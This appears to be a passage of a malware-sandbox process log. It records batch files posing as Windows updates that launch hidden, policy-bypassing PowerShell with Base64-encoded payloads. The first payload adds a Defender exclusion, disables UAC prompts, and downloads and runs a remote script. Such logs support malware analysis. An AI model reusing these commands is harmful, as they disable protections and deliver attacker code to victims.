                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE
2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('…
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('…
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex unrestricted -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'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'+[char]0x22+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex unrestricted -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'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'+[char]0x22+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte
2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex unrestricted -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'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'+[char]0x22+'))')))"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex unrestricted -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'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'+[char]0x22+'))')))"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte
2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte
2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
